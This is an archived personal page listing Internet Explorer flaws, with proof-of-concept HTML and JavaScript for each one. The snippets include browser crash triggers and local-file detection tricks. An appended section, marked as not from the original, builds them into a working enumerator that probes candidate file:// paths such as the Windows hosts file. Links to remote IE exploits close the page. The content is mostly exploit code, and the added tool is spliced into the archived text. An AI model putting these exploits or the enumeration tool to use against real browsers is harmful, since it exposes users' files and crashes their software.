Www.edup.tudelft.nl/~bjwever/advisory ie flaws.html.php
From Skypher
This information is copied from my old webpage @ http://www.edup.tudelft.nl/~bjwever. Some or all of it may be outdated and incorrect. The only thing close to any guarantee that I can give about the contents of this page is that it is very likely to be chock-full of spelling errors.
Archive of MSIE flaws
Local JavaScript file enumeration using valid JavaScript-file successful load detection
Date: 2005-01-14
<HTML>
<SCRIPT src="...valid local JavaScript file..."></SCRIPT>
<SCRIPT>if (global_variable) alert("found");</SCRIPT>
</HTML>
Stack overflow exception using nested array sort() loop
Date: 2004-10-20
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
"Object.method in for-loop" NULL-pointer exception
Date: 2004-07-11
<HTML>
<SCRIPT language="javascript">
for (a in window.open) { }
</SCRIPT>
</HTML>
Read exception using filename containing 0xFE byte for drive letter
Date: 2004-05-07, discovery by: Emmanouel Kellinis
<HTML> <BODY> <IFRAME src="file://þ:/"> </BODY> </HTML>
Page-Enter, blendTrans() NULL-pointer exception
Date: 2002-07-12
<HTML style="width:expression(navigate('?#'))">
<HEAD>
<META http-equiv="Page-Enter" content="blendTrans()">
</HEAD>
</HTML>
Local image file enumeration using IMG.src and .onload successful load detection
Date: 2002-04-19
<HTML> <IMG src="...local image file..." onLoad="alert('found');"> </HTML>
Stack overflow exception using IMG.src and .onerror loop
Date: 2002-03-24
- (Was fixed but still works by running the script twice)
<HTML> <BODY> <IMG src="::" onError="this.src=this.src;"> <IMG src="::" onError="this.src=this.src;"> </BODY> </HTML>
Local file enumeration using window.onerror and SCRIPT.src JavaScript error detection
Date: 2002-01-03, discovery by: Tom Micklovitch
<HTML>
<SCRIPT>window.onerror = new Function("alert(\"found\"); return true;");</SCRIPT>
<SCRIPT src="...local non-JavaScript file..."></SCRIPT>
</HTML>
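The three enumeration entries above (script-global detection, IMG onload detection, and window.onerror detection) each test one hard-coded file. The following is an added example, not code from the original page, that generalises the script-based variant to a candidate list: a probe reports whether a path loaded, and the enumerator collects the paths that did. The DOM probe is an assumption on two counts: it uses the modern script onload/onerror events rather than the global-variable check the page relies on, and current browsers refuse file:// loads from web origins, so it only reproduces the behaviour on the old MSIE versions the page covers. The candidate paths, the simulated probe and the set of files it treats as present are all constructed here so the enumerator can be run offline under Node.

```javascript
// Added example (not from the original page): local-file enumeration
// generalised from the page's one-file snippets to a list of candidates.

// Browser-side probe (ASSUMPTION: modern <script> onload/onerror events;
// the page's own technique checks a known global after the load).  A clean
// load means a real JavaScript file exists; a window.onerror firing means
// the file exists but is not JavaScript (parse error); neither signal
// within the timeout is treated as "not found".
function browserScriptProbe(url, timeoutMs) {
  return new Promise(function (resolve) {
    var done = false;
    var prevOnError = window.onerror;
    function finish(result) {
      if (done) return;
      done = true;
      window.onerror = prevOnError; // restore the page's handler
      resolve(result);
    }
    window.onerror = function () { finish(true); return true; }; // exists, not JS
    var s = document.createElement("script");
    s.onload = function () { finish(true); };   // exists, valid JS
    s.onerror = function () { finish(false); }; // load failed: not found
    s.src = url;
    document.body.appendChild(s);
    setTimeout(function () { finish(false); }, timeoutMs);
  });
}

// Generic enumerator: probe(url) must return a Promise<boolean>.
// Returns the candidate paths reported present, in candidate order.
async function enumerateLocalFiles(candidates, probe) {
  var found = [];
  for (var i = 0; i < candidates.length; i++) {
    if (await probe(candidates[i])) found.push(candidates[i]);
  }
  return found;
}

// CONSTRUCTED stand-in for the browser probe: a fixed set of paths that
// "exist" on the simulated victim machine.  Both entries are made up.
var SIMULATED_EXISTING = {
  "file:///C:/WINDOWS/system32/drivers/etc/hosts": true,
  "file:///C:/Program%20Files/Example/example.js": true
};
function simulatedProbe(url) {
  return Promise.resolve(Boolean(SIMULATED_EXISTING[url]));
}

// CONSTRUCTED candidate list an attacker page might try.
var CANDIDATES = [
  "file:///C:/WINDOWS/system32/drivers/etc/hosts",
  "file:///C:/nonexistent.txt",
  "file:///C:/Program%20Files/Example/example.js"
];

// Run the enumeration against the simulated probe; in a real page the
// second argument would be function (u) { return browserScriptProbe(u, 2000); }.
function demo() {
  return enumerateLocalFiles(CANDIDATES, simulatedProbe);
}

demo().then(function (found) { console.log("found:", found); });
```

The enumerator is deliberately split from the probe: the probe is the part that changes between the three detection tricks on this page (script global, IMG onload, window.onerror), while the walk over candidates and the result collection stay the same.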
Links
- IFRAME src&name property BoF: Advisory on Internet Explorer remote compromise.
- Internet Exploiter 1: Remote exploit for Internet Explorer IFRAME src&name property BoF.
- Internet Exploiter 3: Remote exploit for Internet Explorer .ANI file Animation Header Length BoF.
